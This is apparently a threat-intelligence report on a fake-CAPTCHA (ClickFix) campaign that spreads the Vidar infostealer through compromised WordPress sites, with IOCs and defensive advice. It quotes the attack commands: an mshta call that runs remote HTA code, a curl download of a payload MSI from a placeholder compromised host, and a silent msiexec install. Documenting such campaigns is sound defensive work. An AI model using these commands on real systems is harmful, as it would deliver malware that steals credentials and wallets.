Over the past few years, attackers have increasingly shifted toward social engineering techniques rather than relying solely on software vulnerabilities. One such method, commonly referred to as ClickFix or fake CAPTCHA abuse, has gained significant traction.
In this campaign, threat actors trick users into executing malicious commands themselves. This report outlines a recently observed operation delivering the Vidar infostealer through multiple infection paths, primarily leveraging compromised WordPress websites and deceptive verification pages.
2. Campaign Overview
Researchers identified a widespread campaign targeting users across multiple regions, including:
- Italy
- France
- United States
- United Kingdom
- Brazil
The attack chain begins when users land on compromised WordPress sites that display a fake human verification (CAPTCHA) page. Instead of performing a real verification, users are instructed to execute a command, unknowingly initiating malware delivery.
3. Malware Profile: Vidar Infostealer
Vidar is a well-established information-stealing malware designed to extract sensitive data from infected systems. Its capabilities include:
- Harvesting browser credentials (usernames and passwords)
- Extracting cryptocurrency wallet data
- Collecting session cookies and authentication tokens
- Accessing autofill and stored payment information
- Searching for files containing sensitive or valuable data
A key characteristic of Vidar is its ability to operate in memory, which helps it avoid detection while silently exfiltrating stolen information to remote servers.
4. Initial Access Vector: Fake CAPTCHA Pages
When visiting a compromised site, users are presented with a page mimicking a legitimate verification service (similar to Cloudflare’s “Verify you are human” prompt).
Instead of solving a CAPTCHA, users are asked to run a command such as:
mshta https://{compromised-site}/challenge/cf
Why this works:
- mshta.exe is a legitimate Windows utility used to execute HTML Applications (HTA).
- Because it is a trusted system binary, attackers abuse it to bypass security controls.
This marks the beginning of the infection chain.
5. Infection Chain Breakdown
5.1 HTA Execution Stage
The executed command launches an obfuscated HTA script that performs several stealthy actions:
- Shrinks its window to 0x0 size and moves it off-screen
- Verifies the execution context (must originate from HTTP/HTTPS)
- Decodes embedded strings using XOR with randomized keys
- Queries system information via WMI (including antivirus presence)
- Creates hidden working directories under: \AppData\Local
5.2 MSI Payload Delivery
The HTA script downloads a malicious MSI installer using a command similar to:
curl.exe -s -L -o <path>\cleankises.msi https://{compromised-site}/payload.msi
The file is validated (must exceed 100 KB), and metadata such as the Zone Identifier is removed to reduce detection. The installer is then executed silently:
msiexec.exe /i <path>\cleankises.msi /qn
5.3 MSI and Loader Execution
Inside the MSI package:
- A CustomAction (ConfigureNetFx) is defined
- This action launches a GoLang-based malware loader
Loader Responsibilities:
- Decrypt and execute the final payload
- Maintain stealth and evade analysis
5.4 Anti-Analysis Techniques
The loader performs multiple checks to detect debugging or sandbox environments:
CheckRemoteDebuggerPresentIsDebuggerPresentQueryPerformanceCounterGetTickCount
After passing these checks, the loader decrypts and executes Vidar directly in memory, avoiding disk-based detection.
6. Compromised WordPress Infrastructure
The campaign relies heavily on infected WordPress websites.
6.1 Malicious Injection Mechanism
Injected code loads malicious content through iframe sources such as:
cdnwoopress[.]comwoopresscdn[.]com
These domains act as payload delivery infrastructure.
6.2 Backend Functionality
Due to a misconfiguration, researchers were able to observe backend behavior. The injected script performs:
- Creation of a malicious plugin file: wp-cache-manager.php
- Periodic “heartbeat” communication with attacker servers (every hour)
- Collection of site metadata:
- Domain
- URL
- WordPress version
- Site status
6.3 Target Filtering
The script selectively targets victims:
- Filters based on User-Agent
- Focuses on Windows desktop users
- Replaces legitimate page content with attacker-controlled HTML
Payload delivery commands are retrieved from:
/api/get_payload
7. Indicators of Compromise (IOCs)
7.1 Malicious Domains
cdnwoopress[.]com— Fake CAPTCHA infrastructurewoopresscdn[.]com— Fake CAPTCHA infrastructurewalwood[.]be— Fake CAPTCHA infrastructure
7.2 Command and Control (C2)
telegram[.]me/dikkh0ktelegram[.]me/pr55iisteamcommunity[.]com/profiles/76561198742377525steamcommunity[.]com/profiles/76561198735736086
8. Defensive Recommendations
This attack relies heavily on user interaction, so awareness and basic hygiene play a critical role.
8.1 User Awareness
- Never execute commands from websites claiming to “verify” you
- Treat any request involving Win+R, PowerShell, or Terminal as suspicious
8.2 Verification Practices
- Cross-check instructions through official documentation
- Avoid trusting on-page instructions blindly
8.3 Safe Command Handling
- Avoid copy-pasting commands from unknown sources
- If necessary, type commands manually to prevent hidden payload execution
8.4 Endpoint Protection
- Keep OS and browsers updated
- Use endpoint security tools capable of detecting infostealers
- Enable browser protections against malicious scripts
8.5 Threat Awareness
Attack techniques like fake CAPTCHA pages continue to evolve. Recognizing that attackers may rely on human behavior rather than exploits is key to prevention.
9. Conclusion
This campaign highlights a growing trend in cyber threats: manipulating users instead of exploiting systems. By abusing trusted tools like mshta and msiexec, attackers reduce their reliance on vulnerabilities and increase success rates. Organizations should focus not only on technical defenses but also on user education and behavioral detection to effectively mitigate such threats.
